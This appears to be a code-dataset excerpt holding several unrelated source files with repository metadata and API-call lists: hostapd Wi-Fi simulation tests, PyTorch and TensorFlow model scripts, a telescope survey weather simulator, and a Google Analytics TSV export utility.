params = { "ssid": "open", "ap_max_inactivity": "1" } hapd = hostapd.add_ap(apdev[0]['ifname'], params) bssid = apdev[0]['bssid'] dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") dev[1].connect("open", key_mgmt="NONE", scan_freq="2412") subprocess.call(['ip', 'link', 'set', 'dev', apdev[0]['ifname'], 'down']) ev = hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=10) if ev is None: raise Exception("Timeout on AP-STA-DISCONNECTED (1)") ev = hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=5) if ev is None: raise Exception("Timeout on AP-STA-DISCONNECTED (2)") ev = hapd.wait_event(["INTERFACE-DISABLED"], timeout=5) if ev is None: raise Exception("No INTERFACE-DISABLED event") # The following wait tests beacon loss detection in mac80211 on dev0. # dev1 is used to test stopping of AP side functionality on client polling. 
dev[1].request("REMOVE_NETWORK all") subprocess.call(['ip', 'link', 'set', 'dev', apdev[0]['ifname'], 'up']) dev[0].wait_disconnected() dev[1].wait_disconnected() ev = hapd.wait_event(["INTERFACE-ENABLED"], timeout=10) if ev is None: raise Exception("No INTERFACE-ENABLED event") dev[0].wait_connected() hwsim_utils.test_connectivity(dev[0], hapd) def test_ap_open_disconnect_in_ps(dev, apdev, params): """Disconnect with the client in PS to regression-test a kernel bug""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", bg_scan_period="0") ev = hapd.wait_event([ "AP-STA-CONNECTED" ], timeout=5) if ev is None: raise Exception("No connection event received from hostapd") time.sleep(0.2) hwsim_utils.set_powersave(dev[0], hwsim_utils.PS_MANUAL_POLL) try: # inject some traffic sa = hapd.own_addr() da = dev[0].own_addr() hapd.request('DATA_TEST_CONFIG 1') hapd.request('DATA_TEST_TX {} {} 0'.format(da, sa)) hapd.request('DATA_TEST_CONFIG 0') # let the AP send couple of Beacon frames time.sleep(0.3) # disconnect - with traffic pending - shouldn't cause kernel warnings dev[0].request("DISCONNECT") finally: hwsim_utils.set_powersave(dev[0], hwsim_utils.PS_DISABLED) time.sleep(0.2) out = run_tshark(os.path.join(params['logdir'], "hwsim0.pcapng"), "wlan_mgt.tim.partial_virtual_bitmap", ["wlan_mgt.tim.partial_virtual_bitmap"]) if out is not None: state = 0 for l in out.splitlines(): pvb = int(l, 16) if pvb > 0 and state == 0: state = 1 elif pvb == 0 and state == 1: state = 2 if state != 2: raise Exception("Didn't observe TIM bit getting set and unset (state=%d)" % state) def test_ap_open_select_network(dev, apdev): """Open mode connection and SELECT_NETWORK to change network""" hapd1 = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) bssid1 = apdev[0]['bssid'] hapd2 = hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open2" }) bssid2 = apdev[1]['bssid'] id1 = dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", only_add_network=True) id2 = dev[0].connect("open2", key_mgmt="NONE", scan_freq="2412") hwsim_utils.test_connectivity(dev[0], hapd2) dev[0].select_network(id1) dev[0].wait_connected() res = dev[0].request("BLACKLIST") if bssid1 in res or bssid2 in res: raise Exception("Unexpected blacklist entry") hwsim_utils.test_connectivity(dev[0], hapd1) dev[0].select_network(id2) dev[0].wait_connected() hwsim_utils.test_connectivity(dev[0], hapd2) res = dev[0].request("BLACKLIST") if bssid1 in res or bssid2 in res: raise Exception("Unexpected blacklist entry(2)") def test_ap_open_disable_enable(dev, apdev): """AP with open mode getting disabled and re-enabled""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", bg_scan_period="0") for i in range(2): hapd.request("DISABLE") dev[0].wait_disconnected() hapd.request("ENABLE") dev[0].wait_connected() hwsim_utils.test_connectivity(dev[0], hapd) def sta_enable_disable(dev, bssid): dev.scan_for_bss(bssid, freq=2412) work_id = dev.request("RADIO_WORK add block-work") ev = dev.wait_event(["EXT-RADIO-WORK-START"]) if ev is None: raise Exception("Timeout while waiting radio work to start") id = dev.connect("open", key_mgmt="NONE", scan_freq="2412", only_add_network=True) dev.request("ENABLE_NETWORK %d" % id) if "connect@" not in dev.request("RADIO_WORK show"): raise Exception("connect radio work missing") dev.request("DISABLE_NETWORK %d" % id) dev.request("RADIO_WORK done " + work_id) ok = False for i in range(30): if 
"connect@" not in dev.request("RADIO_WORK show"): ok = True break time.sleep(0.1) if not ok: raise Exception("connect radio work not completed") ev = dev.wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1) if ev is not None: raise Exception("Unexpected connection") dev.request("DISCONNECT") def test_ap_open_sta_enable_disable(dev, apdev): """AP with open mode and wpa_supplicant ENABLE/DISABLE_NETWORK""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) bssid = apdev[0]['bssid'] sta_enable_disable(dev[0], bssid) wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5') wpas.interface_add("wlan5", drv_params="force_connect_cmd=1") sta_enable_disable(wpas, bssid)
[]
andreakropp/datarobot-user-models
task_templates/pipelines/python3_pytorch_regression/model_utils.py
423ab8c703a545491ad6013a0b7efa3119e2c0fc
#!/usr/bin/env python
# coding: utf-8
# pylint: disable-all
from __future__ import absolute_import

from sklearn.preprocessing import LabelEncoder
from pathlib import Path

import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim


class BinModel(nn.Module):
    expected_target_type = torch.FloatTensor

    def __init__(self, input_size):
        super(BinModel, self).__init__()
        self.fc1 = nn.Linear(input_size, 50)
        self.relu1 = nn.ReLU()
        self.dout = nn.Dropout(0.2)
        self.fc2 = nn.Linear(50, 100)
        self.prelu = nn.PReLU(1)
        self.out = nn.Linear(100, 1)
        self.out_act = nn.Sigmoid()

    def forward(self, input_):
        a1 = self.fc1(input_)
        h1 = self.relu1(a1)
        dout = self.dout(h1)
        a2 = self.fc2(dout)
        h2 = self.prelu(a2)
        a3 = self.out(h2)
        y = self.out_act(a3)
        return y


class RegModel(nn.Module):
    def __init__(self, input_size):
        super(RegModel, self).__init__()
        self.fc1 = nn.Linear(input_size, 50)
        self.relu1 = nn.ReLU()
        self.dout = nn.Dropout(0.2)
        self.fc2 = nn.Linear(50, 100)
        self.prelu = nn.PReLU(1)
        self.out = nn.Linear(100, 1)

    def forward(self, input_):
        a1 = self.fc1(input_)
        h1 = self.relu1(a1)
        dout = self.dout(h1)
        a2 = self.fc2(dout)
        h2 = self.prelu(a2)
        y = self.out(h2)
        return y


class MultiModel(nn.Module):
    expected_target_type = torch.LongTensor

    def __init__(self, input_size, output_size):
        super(MultiModel, self).__init__()
        self.layer1 = nn.Linear(input_size, 8)
        self.relu = nn.ReLU()
        self.layer2 = nn.Linear(8, output_size)
        self.out = nn.Softmax()

    def forward(self, input_):
        out = self.layer1(input_)
        out = self.relu(out)
        out = self.layer2(out)
        out = self.out(out)
        return out


def train_epoch(model, opt, criterion, X, y, batch_size=50):
    model.train()
    losses = []
    for beg_i in range(0, X.size(0), batch_size):
        x_batch = X[beg_i : beg_i + batch_size, :]
        # y_hat will be (batch_size, 1) dim, so coerce target to look the same
        y_batch = y[beg_i : beg_i + batch_size].reshape(-1, 1)
        x_batch = Variable(x_batch)
        y_batch = Variable(y_batch)

        opt.zero_grad()
        # (1) Forward
        y_hat = model(x_batch)
        # (2) Compute diff
        loss = criterion(y_hat, y_batch)
        # (3) Compute gradients
        loss.backward()
        # (4) update weights
        opt.step()
        losses.append(loss.data.numpy())
    return losses


def build_classifier(X, num_labels):
    class_model = BinModel(X.shape[1]) if num_labels == 2 else MultiModel(X.shape[1], num_labels)
    class_opt = optim.Adam(class_model.parameters(), lr=0.001)
    class_criterion = nn.BCELoss() if num_labels == 2 else nn.CrossEntropyLoss()
    return class_model, class_opt, class_criterion


def build_regressor(X):
    reg_model = RegModel(X.shape[1])
    reg_opt = optim.Adam(reg_model.parameters(), lr=0.001)
    reg_criterion = nn.MSELoss()
    return reg_model, reg_opt, reg_criterion


def train_classifier(X, y, class_model, class_opt, class_criterion, n_epochs=5):
    target_encoder = LabelEncoder()
    target_encoder.fit(y)
    transformed_y = target_encoder.transform(y)
    bin_t_X = torch.from_numpy(X.values).type(torch.FloatTensor)
    bin_t_y = torch.from_numpy(transformed_y).type(class_model.expected_target_type)
    for e in range(n_epochs):
        train_epoch(class_model, class_opt, class_criterion, bin_t_X, bin_t_y)


def train_regressor(X, y, reg_model, reg_opt, reg_criterion, n_epochs=5):
    reg_t_X = torch.from_numpy(X.values).type(torch.FloatTensor)
    reg_t_y = torch.from_numpy(y.values).type(torch.FloatTensor)
    for e in range(n_epochs):
        train_epoch(reg_model, reg_opt, reg_criterion, reg_t_X, reg_t_y)


def save_torch_model(model, output_dir_path, filename="torch_bin.pth"):
    output_file_path = Path(output_dir_path) / filename
    torch.save(model, output_file_path)


def subset_data(X):
    numerics = ["int16", "int32", "int64", "float16", "float32", "float64"]
    # exclude any completely-missing columns when checking for numerics
    num_features = list(X.dropna(axis=1, how="all").select_dtypes(include=numerics).columns)
    # keep numeric features, zero-impute any missing values
    # obviously this is a very rudimentary approach to handling missing values
    # a more sophisticated imputer can be implemented by making use of custom transform, load, and predict hooks
    return X[num_features].fillna(0)
[((3164, 3176), 'torch.nn.MSELoss', 'nn.MSELoss', ([], {}), '()\n', (3174, 3176), True, 'import torch.nn as nn\n'), ((3327, 3341), 'sklearn.preprocessing.LabelEncoder', 'LabelEncoder', ([], {}), '()\n', (3339, 3341), False, 'from sklearn.preprocessing import LabelEncoder\n'), ((4120, 4155), 'torch.save', 'torch.save', (['model', 'output_file_path'], {}), '(model, output_file_path)\n', (4130, 4155), False, 'import torch\n'), ((443, 468), 'torch.nn.Linear', 'nn.Linear', (['input_size', '(50)'], {}), '(input_size, 50)\n', (452, 468), True, 'import torch.nn as nn\n'), ((490, 499), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (497, 499), True, 'import torch.nn as nn\n'), ((520, 535), 'torch.nn.Dropout', 'nn.Dropout', (['(0.2)'], {}), '(0.2)\n', (530, 535), True, 'import torch.nn as nn\n'), ((555, 573), 'torch.nn.Linear', 'nn.Linear', (['(50)', '(100)'], {}), '(50, 100)\n', (564, 573), True, 'import torch.nn as nn\n'), ((595, 606), 'torch.nn.PReLU', 'nn.PReLU', (['(1)'], {}), '(1)\n', (603, 606), True, 'import torch.nn as nn\n'), ((626, 643), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (635, 643), True, 'import torch.nn as nn\n'), ((667, 679), 'torch.nn.Sigmoid', 'nn.Sigmoid', ([], {}), '()\n', (677, 679), True, 'import torch.nn as nn\n'), ((1052, 1077), 'torch.nn.Linear', 'nn.Linear', (['input_size', '(50)'], {}), '(input_size, 50)\n', (1061, 1077), True, 'import torch.nn as nn\n'), ((1099, 1108), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (1106, 1108), True, 'import torch.nn as nn\n'), ((1129, 1144), 'torch.nn.Dropout', 'nn.Dropout', (['(0.2)'], {}), '(0.2)\n', (1139, 1144), True, 'import torch.nn as nn\n'), ((1164, 1182), 'torch.nn.Linear', 'nn.Linear', (['(50)', '(100)'], {}), '(50, 100)\n', (1173, 1182), True, 'import torch.nn as nn\n'), ((1204, 1215), 'torch.nn.PReLU', 'nn.PReLU', (['(1)'], {}), '(1)\n', (1212, 1215), True, 'import torch.nn as nn\n'), ((1235, 1252), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (1244, 1252), True, 'import torch.nn as nn\n'), ((1660, 1684), 'torch.nn.Linear', 'nn.Linear', (['input_size', '(8)'], {}), '(input_size, 8)\n', (1669, 1684), True, 'import torch.nn as nn\n'), ((1705, 1714), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (1712, 1714), True, 'import torch.nn as nn\n'), ((1737, 1762), 'torch.nn.Linear', 'nn.Linear', (['(8)', 'output_size'], {}), '(8, output_size)\n', (1746, 1762), True, 'import torch.nn as nn\n'), ((1782, 1794), 'torch.nn.Softmax', 'nn.Softmax', ([], {}), '()\n', (1792, 1794), True, 'import torch.nn as nn\n'), ((2326, 2343), 'torch.autograd.Variable', 'Variable', (['x_batch'], {}), '(x_batch)\n', (2334, 2343), False, 'from torch.autograd import Variable\n'), ((2362, 2379), 'torch.autograd.Variable', 'Variable', (['y_batch'], {}), '(y_batch)\n', (2370, 2379), False, 'from torch.autograd import Variable\n'), ((2911, 2923), 'torch.nn.BCELoss', 'nn.BCELoss', ([], {}), '()\n', (2921, 2923), True, 'import torch.nn as nn\n'), ((2948, 2969), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (2967, 2969), True, 'import torch.nn as nn\n'), ((4083, 4104), 'pathlib.Path', 'Path', (['output_dir_path'], {}), '(output_dir_path)\n', (4087, 4104), False, 'from pathlib import Path\n'), ((3430, 3456), 'torch.from_numpy', 'torch.from_numpy', (['X.values'], {}), '(X.values)\n', (3446, 3456), False, 'import torch\n'), ((3495, 3526), 'torch.from_numpy', 'torch.from_numpy', (['transformed_y'], {}), '(transformed_y)\n', (3511, 3526), False, 'import torch\n'), ((3766, 3792), 
'torch.from_numpy', 'torch.from_numpy', (['X.values'], {}), '(X.values)\n', (3782, 3792), False, 'import torch\n'), ((3831, 3857), 'torch.from_numpy', 'torch.from_numpy', (['y.values'], {}), '(y.values)\n', (3847, 3857), False, 'import torch\n')]
mlandriau/surveysim
py/surveysim/weather.py
e7a323d6c4031b1b8df25e776dbe81188fbe8860
"""Simulate stochastic observing weather conditions. The simulated conditions include seeing, transparency and the dome-open fraction. """ from __future__ import print_function, division, absolute_import from datetime import datetime import numpy as np import astropy.time import astropy.table import astropy.units as u import desiutil.log import desimodel.weather import desisurvey.config import desisurvey.ephem import desisurvey.utils class Weather(object): """Simulate weather conditions affecting observations. The start/stop date range is taken from the survey config. Seeing and transparency values are stored with 32-bit floats to save some memory. Parameters ---------- seed : int Random number seed to use to generate stochastic conditions. The seed determines the same seeing and transparency realization independent of the value of ``replay``. replay : str Either 'random' or a comma-separated list of years whose historical weather should be replayed, e.g. 'Y2010,Y2012'. Replayed weather will be used cyclically if necessary. Random weather will be a boostrap sampling of all available years with historical weather data. Use 'Y2015' for the worst-case weather scenario. time_step : float or :class:`astropy.units.Quantity`, optional Time step calculating updates. Must evenly divide 24 hours. If unitless float, will be interpreted as minutes. restore : filename or None Restore an existing weather simulation from the specified file name. All other parameters are ignored when this is provided. A relative path name refers to the :meth:`configuration output path <desisurvey.config.Configuration.get_path>`. extra_downtime : float Additionally close the dome completely on some nights. Nights are chosen randomly, with the chance of the night being closed equal to extra_random_close_fraction. This is intended to include margin. """ def __init__(self, seed=1, replay='random', time_step=5, restore=None, extra_downtime=0): if not isinstance(time_step, u.Quantity): time_step = time_step * u.min self.log = desiutil.log.get_logger() config = desisurvey.config.Configuration() ephem = desisurvey.ephem.get_ephem() if restore is not None: fullname = config.get_path(restore) self._table = astropy.table.Table.read(fullname) self.start_date = desisurvey.utils.get_date( self._table.meta['START']) self.stop_date = desisurvey.utils.get_date( self._table.meta['STOP']) self.num_nights = self._table.meta['NIGHTS'] self.steps_per_day = self._table.meta['STEPS'] self.replay = self._table.meta['REPLAY'] self.log.info('Restored weather from {}.'.format(fullname)) return else: self.log.info('Generating random weather with seed={} replay="{}".' .format(seed, replay)) gen = np.random.RandomState(seed) # Use our config to set any unspecified dates. start_date = config.first_day() stop_date = config.last_day() num_nights = (stop_date - start_date).days if num_nights <= 0: raise ValueError('Expected start_date < stop_date.') # Check that the time step evenly divides 24 hours. steps_per_day = int(round((1 * u.day / time_step).to(1).value)) if not np.allclose((steps_per_day * time_step).to(u.day).value, 1.): raise ValueError( 'Requested time_step does not evenly divide 24 hours: {0}.' .format(time_step)) # Calculate the number of times where we will tabulate the weather. num_rows = num_nights * steps_per_day meta = dict(START=str(start_date), STOP=str(stop_date), NIGHTS=num_nights, STEPS=steps_per_day, REPLAY=replay) self._table = astropy.table.Table(meta=meta) # Initialize column of MJD timestamps. 
t0 = desisurvey.utils.local_noon_on_date(start_date) times = t0 + (np.arange(num_rows) / float(steps_per_day)) * u.day self._table['mjd'] = times.mjd # Generate a random atmospheric seeing time series. dt_sec = 24 * 3600. / steps_per_day self._table['seeing'] = desimodel.weather.sample_seeing( num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32) # Generate a random atmospheric transparency time series. self._table['transparency'] = desimodel.weather.sample_transp( num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32) if replay == 'random': # Generate a bootstrap sampling of the historical weather years. years_to_simulate = config.last_day().year - config.first_day().year + 1 history = ['Y{}'.format(year) for year in range(2007, 2018)] replay = ','.join(gen.choice(history, years_to_simulate, replace=True)) # Lookup the dome closed fractions for each night of the survey. # This step is deterministic and only depends on the config weather # parameter, which specifies which year(s) of historical daily # weather to replay during the simulation. dome_closed_frac = desimodel.weather.dome_closed_fractions( start_date, stop_date, replay=replay) r = gen.uniform(size=num_nights) r2 = gen.uniform(size=num_nights) dome_closed_frac[r2 < extra_downtime] = 1. # Convert fractions of scheduled time to hours per night. ilo, ihi = (start_date - ephem.start_date).days, (stop_date - ephem.start_date).days bright_dusk = ephem._table['brightdusk'].data[ilo:ihi] bright_dawn = ephem._table['brightdawn'].data[ilo:ihi] dome_closed_time = dome_closed_frac * (bright_dawn - bright_dusk) # Randomly pick between three scenarios for partially closed nights: # 1. closed from dusk, then open the rest of the night. # 2. open at dusk, then closed for the rest of the night. # 3. open and dusk and dawn, with a closed period during the night. # Pick scenarios 1+2 with probability equal to the closed fraction. # Use a fixed number of random numbers to decouple from the seeing # and transparency sampling below. self._table['open'] = np.ones(num_rows, bool) for i in range(num_nights): sl = slice(i * steps_per_day, (i + 1) * steps_per_day) night_mjd = self._table['mjd'][sl] # Dome is always closed before dusk and after dawn. closed = (night_mjd < bright_dusk[i]) | (night_mjd >= bright_dawn[i]) if dome_closed_frac[i] == 0: # Dome open all night. pass elif dome_closed_frac[i] == 1: # Dome closed all night. This occurs with probability frac / 2. closed[:] = True elif r[i] < 0.5 * dome_closed_frac[i]: # Dome closed during first part of the night. # This occurs with probability frac / 2. closed |= (night_mjd < bright_dusk[i] + dome_closed_time[i]) elif r[i] < dome_closed_frac[i]: # Dome closed during last part of the night. # This occurs with probability frac / 2. closed |= (night_mjd > bright_dawn[i] - dome_closed_time[i]) else: # Dome closed during the middle of the night. # This occurs with probability 1 - frac. Use the value of r[i] # as the fractional time during the night when the dome reopens. dome_open_at = bright_dusk[i] + r[i] * (bright_dawn[i] - bright_dusk[i]) dome_closed_at = dome_open_at - dome_closed_time[i] closed |= (night_mjd >= dome_closed_at) & (night_mjd < dome_open_at) self._table['open'][sl][closed] = False self.start_date = start_date self.stop_date = stop_date self.num_nights = num_nights self.steps_per_day = steps_per_day self.replay = replay def save(self, filename, overwrite=True): """Save the generated weather to a file. The saved file can be restored using the constructor `restore` parameter. 
Parameters ---------- filename : str Name of the file where the weather should be saved. A relative path name refers to the :meth:`configuration output path <desisurvey.config.Configuration.get_path>`. overwrite : bool Silently overwrite any existing file when this is True. """ config = desisurvey.config.Configuration() filename = config.get_path(filename) self._table.write(filename, overwrite=overwrite) self.log.info('Saved weather to {0}.'.format(filename)) def get(self, time): """Get the weather conditions at the specified time(s). Returns the conditions at the closest tabulated time, rather than using interpolation. Parameters ---------- time : astropy.time.Time Time(s) when the simulated weather is requested. Returns ------- table slice Slice of precomputed table containing row(s) corresponding to the requested time(s). """ offset = np.floor( (time.mjd - self._table['mjd'][0]) * self.steps_per_day + 0.5 ).astype(int) if np.any(offset < 0) or np.any(offset > len(self._table)): raise ValueError('Cannot get weather beyond tabulated range.') return self._table[offset]
[((3159, 3186), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (3180, 3186), True, 'import numpy as np\n'), ((6535, 6558), 'numpy.ones', 'np.ones', (['num_rows', 'bool'], {}), '(num_rows, bool)\n', (6542, 6558), True, 'import numpy as np\n'), ((9727, 9745), 'numpy.any', 'np.any', (['(offset < 0)'], {}), '(offset < 0)\n', (9733, 9745), True, 'import numpy as np\n'), ((9606, 9677), 'numpy.floor', 'np.floor', (["((time.mjd - self._table['mjd'][0]) * self.steps_per_day + 0.5)"], {}), "((time.mjd - self._table['mjd'][0]) * self.steps_per_day + 0.5)\n", (9614, 9677), True, 'import numpy as np\n'), ((4263, 4282), 'numpy.arange', 'np.arange', (['num_rows'], {}), '(num_rows)\n', (4272, 4282), True, 'import numpy as np\n')]
takeratta/ga-dev-tools
lib/csv_writer.py
19dcf7c750af8214e5a306fc0f8e2b28bef7bb40
# coding=utf-8 # Copyright 2015 Google Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utility to convert a Data Export API reponse into TSV. This provides utitlites to both print TSV files to the standard output as well as directly to a file. This logic handles all the utf-8 conversion. GetTsvFilePrinter: Returns an instantiated object to output to files. GetTsvScreenPrinter: Returns an instantiated object to output to the screen. UnicodeWriter(): Utf-8 encodes output. ExportPrinter(): Converts the Data Export API response into tabular data. """ __author__ = 'api.nickm@ (Nick Mihailovski)' import codecs import csv import StringIO import sys import types # A list of special characters that need to be escaped. SPECIAL_CHARS = ('+', '-', '/', '*', '=') # TODO(nm): Test leading numbers. def GetTsvFilePrinter(file_name): """Returns a ExportPrinter object to output to file_name. Args: file_name: string The name of the file to output to. Returns: The newly created ExportPrinter object. """ my_handle = open(file_name) writer = UnicodeWriter(my_handle, dialect='excel-tab') return ExportPrinter(writer) def GetTsvScreenPrinter(): """Returns a ExportPrinter object to output to std.stdout.""" writer = UnicodeWriter(sys.stdout, dialect='excel-tab') return ExportPrinter(writer) def GetTsvStringPrinter(f): """Returns a ExportPrinter object to output to std.stdout.""" writer = UnicodeWriter(f, dialect='excel-tab') return ExportPrinter(writer) # Wrapper to output to utf-8. Taken mostly / directly from Python docs: # http://docs.python.org/library/csv.html class UnicodeWriter(object): """A CSV writer which uses the csv module to output csv compatible formats. Will write rows to CSV file "f", which is encoded in the given encoding. """ def __init__(self, f, dialect=csv.excel, encoding='utf-8', **kwds): # Redirect output to a queue self.queue = StringIO.StringIO() self.writer = csv.writer(self.queue, dialect=dialect, **kwds) self.stream = f self.encoder = codecs.getincrementalencoder(encoding)() # pylint: disable=g-bad-name def writerow(self, row): """Writes a CSV row. Args: row: list The row to write to the CSV output. """ self.writer.writerow([s.encode('utf-8') for s in row]) # Fetch UTF-8 output from the queue ... data = self.queue.getvalue() data = data.decode('utf-8') # ... and reencode it into the target encoding data = self.encoder.encode(data) # write to the target stream self.stream.write(data) # empty queue self.queue.truncate(0) # pylint: disable=g-bad-name def writerows(self, rows): """Writes rows for CSV output. Args: rows: list of rows to write. """ for row in rows: self.writerow(row) class ExportPrinter(object): """Utility class to output a the data feed as tabular data.""" def __init__(self, writer): """Initializes the class. Args: writer: Typically an instance of UnicodeWriter. The interface for this object provides two methods, writerow and writerow, which accepts a list or a list of lists respectively and process them as needed. 
""" self.writer = writer def Output(self, results): """Outputs formatted rows of data retrieved from the Data Export API. This uses the writer object to output the data in the Data Export API. Args: results: The response from the data export API. """ if not results.get('rows'): self.writer.writerow('No Results found') else: self.OutputProfileName(results) self.writer.writerow([]) self.OutputContainsSampledData(results) self.writer.writerow([]) self.OutputQueryInfo(results) self.writer.writerow([]) self.OutputHeaders(results) self.OutputRows(results) self.writer.writerow([]) self.OutputRowCounts(results) self.OutputTotalsForAllResults(results) def OutputProfileName(self, results): """Outputs the profile name along with the qurey.""" profile_name = '' info = results.get('profileInfo') if info: profile_name = info.get('profileName') self.writer.writerow(['Report For View (Profile): ', profile_name]) def OutputQueryInfo(self, results): """Outputs the query used.""" self.writer.writerow(['These query parameters were used:']) query = results.get('query') for key, value in query.iteritems(): if type(value) == types.ListType: value = ','.join(value) else: value = str(value) value = ExcelEscape(value) self.writer.writerow([key, value]) def OutputContainsSampledData(self, results): """Outputs whether the resuls have been sampled.""" sampled_text = 'do not' if results.get('containsSampledData'): sampled_text = 'do' row_text = 'These results %s contain sampled data.' % sampled_text self.writer.writerow([row_text]) def OutputHeaders(self, results): """Outputs all the dimension and metric names in order.""" row = [] for header in results.get('columnHeaders'): row.append(header.get('name')) self.writer.writerow(row) def OutputRows(self, results): """Outputs all the rows in the table.""" # Replace any first characters that have an = with '= for row in results.get('rows'): out_row = [] for cell in row: cell = ExcelEscape(cell) out_row.append(cell) self.writer.writerow(out_row) def OutputRowCounts(self, results): """Outputs how many rows were returned vs rows that were matched.""" items = str(results.get('itemsPerPage')) matched = str(results.get('totalResults')) output = [ ['Rows Returned', items], ['Rows Matched', matched] ] self.writer.writerows(output) def OutputTotalsForAllResults(self, results): """Outputs the totals for all results matched by the query. This is not the sum of the values returned in the response. This will align the metric totals in the same columns as the headers are printed. The totals are stored as a dict, where the key is the metric name and the value is the total. To align these totals in the proper columns, a position index of the metric name and it's position in the table is first created. Then the totals are added by position to a row of empty strings. Args: results: API Response from Core Reporting API. """ # Create the metric position index. metric_index = {} headers = results.get('columnHeaders') for index in range(0, len(headers)): header = headers[index] if header.get('columnType') == 'METRIC': metric_index[header.get('name')] = index # Create a row of empty strings the same length as the header. row = [''] * len(headers) # Use the position index to output the totals in the right columns. 
totals = results.get('totalsForAllResults') for metric_name, metric_total in totals.iteritems(): index = metric_index[metric_name] row[index] = metric_total self.writer.writerows([['Totals For All Rows Matched'], row]) def ExcelEscape(input_value): """Escapes the first character of a string if it is special in Excel. Args: input_value: string The value to escape. Returns: A string that has the first character escaped if it is special. """ if input_value and input_value[0] in SPECIAL_CHARS: return "'" + input_value return input_value
[((2465, 2484), 'StringIO.StringIO', 'StringIO.StringIO', ([], {}), '()\n', (2482, 2484), False, 'import StringIO\n'), ((2503, 2550), 'csv.writer', 'csv.writer', (['self.queue'], {'dialect': 'dialect'}), '(self.queue, dialect=dialect, **kwds)\n', (2513, 2550), False, 'import csv\n'), ((2590, 2628), 'codecs.getincrementalencoder', 'codecs.getincrementalencoder', (['encoding'], {}), '(encoding)\n', (2618, 2628), False, 'import codecs\n')]
yuwenxianglong/zhxsh.github.io
resdata/TensorFlow/RNN_Prediction/stockPrediction202005201318.py
427d14b787e55df26e03a069288815b14ab6b534
# -*- coding: utf-8 -*-
"""
@Project : RNN_Prediction
@Author : Xu-Shan Zhao
@Filename: stockPrediction202005201318.py
@IDE : PyCharm
@Time1 : 2020-05-20 13:18:46
@Time2 : 2020/5/20 13:18
@Month1 : 5月
@Month2 : 五月
"""

import tushare as ts
import tensorflow as tf
import pandas as pd
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt

stock_catl = ts.get_hist_data('300750')
stock_catl = stock_catl.sort_index(ascending=True)
stock_catl = (stock_catl - stock_catl.mean()) / \
             (stock_catl.max() - stock_catl.min())

# train, val = train_test_split(stock_catl, test_size=0.5)
# train = train.sort_index(ascending=True)
# val = val.sort_index(ascending=True)
train = stock_catl.iloc[:-60, :]
val = stock_catl.iloc[-60:, :]

window_size = 30
column = 'high'
epoches = 300


def batch_dataset(dataset):
    dataset_batched = dataset.batch(window_size, drop_remainder=True)
    return dataset_batched


def zip_ds(dataset):
    ds_data = tf.constant(dataset.values, dtype=tf.float32)
    ds_data = tf.data.Dataset.from_tensor_slices(ds_data). \
        window(window_size, shift=1).flat_map(batch_dataset)
    ds_label = tf.constant(dataset.values[window_size:], dtype=tf.float32)
    ds_label = tf.data.Dataset.from_tensor_slices(ds_label)
    ds_train = tf.data.Dataset.zip((ds_data, ds_label)).batch(128).repeat()
    return ds_train


ds_train = zip_ds(train)
ds_val = zip_ds(val)

model = tf.keras.Sequential(
    [
        tf.keras.layers.LSTM(128, return_sequences=True, activation='relu'),
        tf.keras.layers.LSTM(128, activation='relu'),
        tf.keras.layers.Dense(13)
    ]
)

optimizer = tf.keras.optimizers.Adam(learning_rate=0.01)
model.compile(optimizer=optimizer, loss='mse')

history = model.fit(
    ds_train,
    epochs=epoches,
    steps_per_epoch=5,
    validation_data=ds_val,
    validation_steps=1
)

model.save('stockLSTM')

# Plot loss function
plt.figure(figsize=(19, 9))
ax = plt.gca()
plt.plot(range(len(history.history['loss'])), history.history['loss'])
plt.plot(range(len(history.history['val_loss'])), history.history['val_loss'])
ax.set_yscale('log')
plt.show()

# Compare fitting and real values.
dff = pd.DataFrame()
for i in range(len(stock_catl) - window_size):
    fits = model.predict(tf.constant(tf.expand_dims(stock_catl.values[i:i + window_size, :], axis=0)))
    dffits = pd.DataFrame(fits, columns=stock_catl.columns)
    dff = dff.append(dffits)
dff.index = stock_catl.index[window_size:]

plt.figure(figsize=(19, 9))
dff[column].plot()
stock_catl.iloc[window_size:, :][column].plot(style='-o')
plt.show()

# To predict future 100 business days.
dfp = stock_catl.copy()
for i in range(100):
    pres = model.predict(tf.constant(tf.expand_dims(dfp.values[-1 * window_size:], axis=0)))
    dfpres = pd.DataFrame(pres, columns=stock_catl.columns)
    dfp = dfp.append(dfpres, ignore_index=True)

dfp[column].plot()
plt.show()
